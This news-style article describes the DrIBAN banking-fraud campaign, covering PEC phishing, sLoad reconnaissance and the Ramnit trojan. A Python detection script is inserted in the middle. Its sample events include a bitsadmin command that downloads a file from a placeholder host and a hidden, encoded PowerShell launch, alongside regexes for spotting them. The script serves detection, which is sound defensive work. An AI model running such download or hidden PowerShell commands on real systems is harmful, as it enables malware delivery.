Italian Corporate Banks Under Attack from Financial Fraud Campaign



Since at least 2019, Italian corporate banking customers have been targeted by a new financial fraud campaign that uses a web-inject toolkit called DrIBAN. The toolkit is capable of altering beneficiary account details during financial transactions, allowing fraudsters to transfer funds to illegitimate bank accounts. The campaign has been identified by Cleafy researchers who have reported that the fraudsters have gradually enhanced their tactics over the course of four years.

The campaign first targeted Italian corporate banks in 2019 and went quiet in 2020. In 2021, however, a new wave was observed hitting thousands of victims, and it is believed to be still ongoing. The attackers have refined their social engineering to keep a foothold in the targeted environment for longer while avoiding detection. They also use the Automated Transfer System (ATS) technique to bypass the anti-fraud controls used by banks, such as multi-factor authentication (MFA) and strong customer authentication (SCA).

The DrIBAN fraud operations target Windows workstations in the banks, attempting to replace legitimate bank details with those of accounts controlled by the attackers or their affiliates. To begin the attack, the fraudsters send a certified email or PEC (a special type of email used in Italy as a legal equivalent of registered mail) to potential victims, attempting to fool them into opening an attachment. These phishing emails carry an executable file designed to download sLoad, a PowerShell-based reconnaissance tool, onto the infected computer.

Once sLoad is running, it collects system information and exfiltrates it so the operators can assess the infected machine. It relies on Living-off-the-land (LotL) techniques that abuse legitimate tools such as BITSAdmin and PowerShell. If the target is deemed profitable, the Ramnit banking trojan is dropped as the next-stage payload.
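As an added example (not code from the article or from Cleafy's report), the following Python triages constructed process-creation events for the BITSAdmin and PowerShell living-off-the-land patterns the article attributes to sLoad; the sample events, the rule set and the indicator names are my own assumptions, not published campaign telemetry.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, abridged).
# These are illustrative, not real telemetry from the DrIBAN/sLoad campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority foreground http://example.invalid/a.bin C:\Users\Public\a.bin"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /list /allusers"},          # benign admin use
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Temp"},  # benign interactive use
]

# Parents that rarely have a legitimate reason to launch downloaders (assumed list).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.I)
ENCODED_RE = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)
HIDDEN_RE = re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of LotL indicators matched by one process-creation event."""
    tags = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    # BITSAdmin used to pull a remote file, rather than to list or manage jobs.
    if image == "bitsadmin.exe" and re.search(r"/(transfer|addfile)\b", cmd, re.I) and URL_RE.search(cmd):
        tags.append("bitsadmin_remote_download")
    if image == "powershell.exe":
        if ENCODED_RE.search(cmd):
            tags.append("powershell_encoded_command")
        if HIDDEN_RE.search(cmd):
            tags.append("powershell_hidden_window")
    # Escalate when a suspicious tool was launched by a script or Office host.
    if tags and parent in SCRIPT_HOSTS:
        tags.append("spawned_by_script_or_office_host")
    return tags

def triage(events):
    """Map event index -> indicators for every event that matched at least one rule."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```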

Ramnit is one of the most notorious banking trojans in the world. Active since 2010, it has evolved over the years into one of the most effective. It steals sensitive information such as login credentials, banking details, and personal information, which is then sent to a command-and-control server operated by the attackers.

The attackers use the stolen information to conduct fraudulent transactions, transfer funds to illegitimate accounts, and initiate other malicious activities. The attacks are highly sophisticated and difficult to detect, making them a significant threat to Italian corporate banks and their customers.

To protect themselves, Italian corporate banks and their customers should remain vigilant against phishing emails and other social engineering tactics. They should also implement strong cybersecurity measures such as multi-factor authentication, encryption, and network segmentation to prevent unauthorized access to sensitive information.

In addition, Italian corporate banks should invest in advanced threat detection and response solutions that use artificial intelligence and machine learning to detect and respond to threats in real-time. These solutions can help banks quickly identify and neutralize threats before they cause significant damage.

In conclusion, the financial fraud campaign targeting Italian corporate banking customers using the DrIBAN web-inject toolkit and the Ramnit banking trojan is a significant threat that requires immediate attention. Italian corporate banks and their customers must take proactive measures to protect themselves against these attacks and prevent fraudsters from stealing their sensitive information and funds. By implementing strong cybersecurity measures and investing in advanced threat detection and response solutions, they can effectively combat this threat and safeguard their financial systems and assets.
